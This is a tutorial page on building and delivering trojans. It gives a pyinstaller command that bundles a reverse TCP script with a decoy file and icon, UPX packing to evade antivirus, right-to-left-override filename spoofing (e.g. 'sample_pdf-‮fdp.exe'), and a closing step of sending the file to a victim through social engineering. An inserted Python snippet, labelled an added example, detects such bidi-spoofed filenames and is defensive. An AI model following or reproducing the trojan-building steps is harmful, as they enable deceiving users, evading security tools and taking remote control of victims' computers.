Packaging Trojans with any file

Using App Data

Steps

  • Install Pyinstaller
  • Downloading the icon:
    • Download an icon from IconFinder
    • Set filters to free and choose high resolution
    • Download the icon
  • Changing the downloaded png to ico:
    • Visit ICO convert or OnlineConvert.com
    • Upload the image
    • Choose the desired settings
    • Convert and download the ico file
  • If using requests use 2.5.1

    pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"
    

Bypassing AV using UPX

  • Download UPX
  • Extract files
  • Use UPX to compress pyinstaller generated executable
  • Syntax:

    ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"
    

Spoofing File Type

  • file_name-(type_everything_in_reverse_order) and paste copied character after -.

  • eg : sample_pdf-fdp.exe

    • file_name : sample_pdf
    • spoofing_extension : pdf
    • reverse order of spoofing extension : fdp
    • file_extension : exe
  • spoofed file_name : sample_pdf-‮fdp.exe

  • Search words ending with exe (if windows executable) and remove - to make trojan to look like a real file.

  • word ending with exe : alexe
  • spoofed file_name : spoofed_alexe.pdf
  • actual file_name : spoofed_alfdp.exe
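
For detection, names spoofed this way can be flagged by looking for Unicode bidirectional control characters (such as U+202E, right-to-left override) in a filename and comparing the extension a user sees with the real one. The following is an added example, not part of the original page; `inspect_filename`, the extension list and the sample names are assumptions constructed for illustration, and the display reversal is a simplification of the Unicode bidi algorithm.

```python
import unicodedata
from pathlib import PurePath

# Unicode bidirectional formatting characters that can reorder displayed text.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f")
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
# Assumed list of extensions Windows will execute; tune to local policy.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi", ".vbs", ".js"}


def strip_bidi(text):
    """Remove bidi control characters, leaving the logical character order."""
    return "".join(c for c in text if c not in BIDI_CONTROLS)


def inspect_filename(name):
    """Classify one filename string; no filesystem access is needed."""
    controls = [f"U+{ord(c):04X} {unicodedata.name(c)}" for c in name if c in BIDI_CONTROLS]
    logical = strip_bidi(name)                    # logical order, controls removed
    real_ext = PurePath(logical).suffix.lower()   # the extension the OS acts on
    # Simplified rendering: everything after the first RLO is drawn reversed.
    head, sep, tail = name.partition(RLO)
    displayed = strip_bidi(head + tail[::-1]) if sep else logical
    shown_ext = PurePath(displayed).suffix.lower()
    if controls and real_ext in EXECUTABLE_EXTS:
        severity = "high"      # hidden reordering on an executable
    elif controls:
        severity = "medium"    # bidi controls are unexpected in filenames
    else:
        severity = "none"
    return {"controls": controls, "logical": logical, "displayed": displayed,
            "real_ext": real_ext, "shown_ext": shown_ext, "severity": severity}


if __name__ == "__main__":
    # Constructed sample names (e.g. from an attachment log or directory listing).
    samples = ["report.pdf", "setup.exe", "sample_pdf-\u202efdp.exe",
               "spoofed_al\u202efdp.exe", "notes\u202e.txt"]
    for s in samples:
        r = inspect_filename(s)
        # ascii() keeps the terminal from applying the reordering itself.
        print(f"{r['severity']:6} raw={ascii(s)} shown={r['displayed']} "
              f"real_ext={r['real_ext']} {r['controls']}")
```

The same check fits a mail gateway attachment filter or an EDR file-creation rule, where any `high` result can be quarantined outright.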

Send File to victim

  • Send file to victim through using attacks or social engineering.